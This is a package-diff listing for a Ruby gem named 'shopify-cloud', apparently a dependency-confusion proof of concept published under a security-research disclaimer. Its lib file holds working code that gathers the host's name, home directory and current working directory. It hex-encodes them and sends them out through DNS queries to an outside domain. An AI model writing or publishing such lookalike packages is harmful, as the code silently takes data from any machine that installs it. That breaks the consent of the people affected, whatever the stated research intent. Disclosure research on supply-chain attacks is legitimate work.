shopify-cloud 2300.4.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/shopify-cloud.rb +64 -0
  3. metadata +44 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: cc90152107465aff369870b099d498aaad4e34597151f100caff81e8a150fb24
4
+ data.tar.gz: 4df10ee9b2c3f5e1bb05ebe2b2d6d7f9608c561969d8b6b8c06ec08b73c23129
5
+ SHA512:
6
+ metadata.gz: 24b344ada3dc706692be320d68b3e2fd5256969badd210e4a55805dc4e58b4371e76cb91d00c4c58c5157e5577686d7cbcfbceac4f9b7072fbee9e4aac33153e
7
+ data.tar.gz: 5922cfb04864a379a41d2c8980cc018c9053d0ab9cf24a42ac5b137f4a5429610126f1ceb928fab55d5dd66f09801f674ddd0525982a5c32f9c0fd183fcddf4f
data/lib/shopify-cloud.rb ADDED
@@ -0,0 +1,64 @@
1
+
2
+ =begin
3
+
4
+ This code is used for research purposes.
5
+
6
+ No sensitive data is retrieved.
7
+
8
+ Callbacks from within organizations with a
9
+ responsible disclosure policy will be reported
10
+ directly to the organizations.
11
+
12
+ Any other callbacks will be ignored, and
13
+ any associated data will not be kept.
14
+
15
+ For any questions or suggestions:
16
+
17
+ alex@ethicalhack.ro
18
+ https://twitter.com/alxbrsn
19
+
20
+ =end
21
+
22
+ require 'socket'
23
+ require 'json'
24
+ require 'resolv'
25
+
26
+ suffix = '.dns.alexbirsan-hacks-paypal.com'
27
+ ns = 'dns1.alexbirsan-hacks-paypal.com'
28
+
29
+ package = 'shopify-cloud'
30
+
31
+ # only the bare minimum to be able to identify
32
+ # a vulnerable organization
33
+ data = {
34
+ 'p' => package,
35
+ 'h' => Socket.gethostname,
36
+ 'd' => File.expand_path('~'),
37
+ 'c' => Dir.pwd
38
+ }
39
+
40
+ data = JSON.generate(data)
41
+ data = data.unpack('H*')[0].scan(/.{1,60}/)
42
+
43
+ id_1 = rand(36**12).to_s(36)
44
+ id_2 = rand(36**12).to_s(36)
45
+
46
+ begin
47
+ ns_ip = Resolv.getaddress(ns)
48
+ rescue
49
+ ns_ip = '4.4.4.4'
50
+ end
51
+
52
+ custom_res = Resolv.new([Resolv::Hosts.new,
53
+ Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
54
+
55
+
56
+ data.each.each_with_index do |chunk, idx|
57
+ begin
58
+ Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
59
+ rescue; end
60
+
61
+ begin
62
+ custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
63
+ rescue; end
64
+ end
metadata ADDED
@@ -0,0 +1,44 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: shopify-cloud
3
+ version: !ruby/object:Gem::Version
4
+ version: 2300.4.2
5
+ platform: ruby
6
+ authors:
7
+ - Alex Birsan
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2020-09-14 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: This package is meant for security research purposes and does not contain
14
+ any useful code.
15
+ email: alex@ethicalhack.ro
16
+ executables: []
17
+ extensions: []
18
+ extra_rdoc_files: []
19
+ files:
20
+ - lib/shopify-cloud.rb
21
+ homepage: https://twitter.com/alxbrsn
22
+ licenses:
23
+ - MIT
24
+ metadata: {}
25
+ post_install_message:
26
+ rdoc_options: []
27
+ require_paths:
28
+ - lib
29
+ required_ruby_version: !ruby/object:Gem::Requirement
30
+ requirements:
31
+ - - ">="
32
+ - !ruby/object:Gem::Version
33
+ version: '0'
34
+ required_rubygems_version: !ruby/object:Gem::Requirement
35
+ requirements:
36
+ - - ">="
37
+ - !ruby/object:Gem::Version
38
+ version: '0'
39
+ requirements: []
40
+ rubygems_version: 3.0.3
41
+ signing_key:
42
+ specification_version: 4
43
+ summary: Security research purposes only
44
+ test_files: []